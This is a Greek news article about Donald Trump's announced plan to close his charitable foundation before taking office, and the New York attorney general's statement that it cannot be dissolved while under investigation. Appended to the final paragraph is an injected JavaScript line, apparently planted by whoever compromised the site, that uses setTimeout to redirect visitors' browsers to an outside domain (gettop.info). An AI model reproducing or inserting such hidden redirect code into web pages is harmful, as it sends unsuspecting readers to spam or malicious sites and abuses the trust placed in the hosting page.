Το φιλανθρωπικό του ίδρυμα κλείνει ο Τραμπ για να αποφύγει… κατηγορίες

0
6

 

Την πρόθεσή του να κλείσει το φιλανθρωπικό του ίδρυμα ανακοίνωσε ο εκλεγείς πρόεδρος των ΗΠΑ Ντόναλντ Τραμπ, ώστε να αποφύγει οποιαδήποτε «σκιά» σύγκρουσης συμφερόντων όταν αναλάβει τα καθήκοντά του.

Ο Τραμπ είπε πως είναι «πολύ περήφανος» για τα χρήματα που συγκέντρωσε το ίδρυμά του, που υποστήριξε πως λειτουργούσε «ουσιαστικά χωρίς κανένα κόστος για δεκαετίες».

«Αλλά επειδή θα αφιερώσω τόσο πολύ χρόνο και ενέργεια στην προεδρία και το να λύσω τα πολλά προβλήματα με τα οποία είναι αντιμέτωπη η χώρα μας και ο κόσμος δεν θέλω να επιτρέψω οι αγαθοεργίες να συνδεθούν με μια δυνητική σύγκρουση συμφερόντων», πρόσθεσε.

Ο Τραμπ δεν διευκρίνισε ποιο είναι το χρονοδιάγραμμα όσον αφορά το κλείσιμο του ιδρύματος. Σε μια ανακοίνωση που έδωσε στη δημοσιότητα, τόνισε ότι θέλει «να αποφευχθεί ακόμη και το να φανεί πως υπάρχει οποιαδήποτε σύγκρουση (συμφέροντος) με τον ρόλο μου ως προέδρου». Έδωσε εντολή στον δικηγόρο του να κάνει τα απαραίτητα βήματα για τη διάλυση του ιδρύματος.

Το ίδρυμα, το Donald J. Trump Foundation, έχει μπει στο στόχαστρο της εισαγγελίας για καταβολή ποσού σε δικαστικό λειτουργό.

Καθώς απομένουν λιγότερες από τέσσερις εβδομάδες ως την ορκωμοσία του την 20ή Ιανουαρίου, ο μεγιστάνας των ακινήτων από τη Νέα Υόρκη δέχεται εντεινόμενες πιέσεις να ελαχιστοποιήσει τις πιθανές συγκρούσεις συμφερόντων, από τις αχανείς διεθνείς επιχειρηματικές του πρωτοβουλίες ως το φιλανθρωπικό έργο της οικογένειάς του.

Πριν από την απροσδόκητη νίκη του Τραμπ στις προεδρικές εκλογές της 8ης Νοεμβρίου, ο εισαγγελέας της Νέας Υόρκης Έρικ Σνάιντερμαν είχε καλέσει τον Οκτώβριο το ίδρυμά του να σταματήσει να δέχεται δωρεές, τονίζοντας πως αυτό παραβίαζε τον νόμο στην πολιτεία, ο οποίος ορίζει ότι οι φιλανθρωπικές οργανώσεις που ζητούν δωρεές να εγγράφονται σε μια πολιτειακή υπηρεσία.

Μια εκπρόσωπος της εισαγγελίας δήλωσε χθες πως ο Τραμπ δεν μπορεί να κλείσει το ίδρυμα διότι η έρευνα συνεχίζεται.

«Το Ίδρυμα Τραμπ τελεί ακόμη υπό έρευνα από αυτή την υπηρεσία και δεν μπορεί νομικά να διαλυθεί ωσότου η έρευνα να ολοκληρωθεί», δήλωσε η Έιμι Σπάιταλνικ, εκπρόσωπος της εισαγγελίας. Δεν απάντησε όταν ερωτήθηκε πότε περιμένει ότι θα έχει ολοκληρωθεί η έρευνα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here